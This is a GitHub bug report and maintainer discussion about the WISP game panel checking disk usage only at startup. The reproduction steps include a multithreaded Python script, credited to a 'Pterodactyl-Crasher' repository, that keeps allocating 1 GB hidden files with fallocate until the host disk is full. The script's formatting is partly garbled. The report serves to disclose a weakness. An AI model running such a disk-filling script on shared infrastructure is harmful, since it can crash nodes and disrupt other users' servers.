search

wisp-gg / issue-tracker

0 stars 0 forks source link

Disk Usage Only Checked on Startup #33

Closed ItzPabz closed 2 months ago

ItzPabz commented 2 months ago

Describe the bug

While I'm not the original creator of this bug, some users in Discord noted a while ago that Disk Usage is only checked on startup, which means someone can intentionally fill up your SSD with useless shit if they want; see below for example.

image

While I'm sure this is a Pterodactyl issue and not a WISP issue, the fact that hosts using WISP may provide Python bot usage using the python-generic egg may be an issue that could fill up a whole node.

Expected Behavior

The expected behavior is that WISP/Pterodactyl should somewhat frequently check the Disk Usage post-startup, wither at some interval or when the server exceeds the limit set.

Actual Behavior

The script is free to run and fill the SSD with whatever the script wants.

Steps to Reproduce

  1. Use the python-generic egg.
  2. Input the following Script (please note I am not the OP or OC of this script): 
    
import concurrent.futures
import subprocess
import threading
import uuid
from time import sleep
import os

megabytes = 0 curr = 0

def allocate_space(): global megabytes, curr while True: try: target = f".__tmp{uuid.uuid4()}" subprocess.run(["fallocate", "-l", "1G", target], check=True) curr += 1 megabytes += 1 except subprocess.CalledProcessError as e: print("Нету места на хосте, ") break except Exception as e: pass

def display_status(): global megabytes, curr displays = 0 try: while True: sleep(0.1) displays += 1 print(f"Закачал всего [ {megabytes} ГБ ] со скоростью [ {curr} Гб/с ]") if displays % 10 == 0: curr = 0 except Exception as e: print(e)

def main(): print("github.com/xdearboy/Pterodactyl-Crasher \n\nPterodactyl-Crasher") print("Режим: забивка всей памяти") print("Подготовка..")

with concurrent.futures.ThreadPoolExecutor(max_workers=48) as executor:
    for _ in range(48):
        executor.submit(allocate_space)

print("Let's go!")
status_thread = threading.Thread(target=display_status)
status_thread.start()

if name == "main": main()


4. Run/start server.

It's important to note that while PTerodactyl might kill the process before the drive is filled up, this is not always the case.

### Browser Details

Any

### Operating System

Any

### Optional additional information

_No response_
Lunaversitay commented 2 months ago

Luckily with WISP there are multiple extra checks that Pterodactyl does not have for disk space. While unfortunately this will always be an issue for any gamepanel since there are not separate physical disks per server WISP has the least likely chance of a script like this working due to the extra checks.

Lunaversitay commented 2 months ago

Going to actually close this, I brought it up to viction and he assured me there are more checks than even Pterodactyl has currently for this issue. If a realistic scenario where this issue starts affecting server occurs we'll take a deeper dive into it.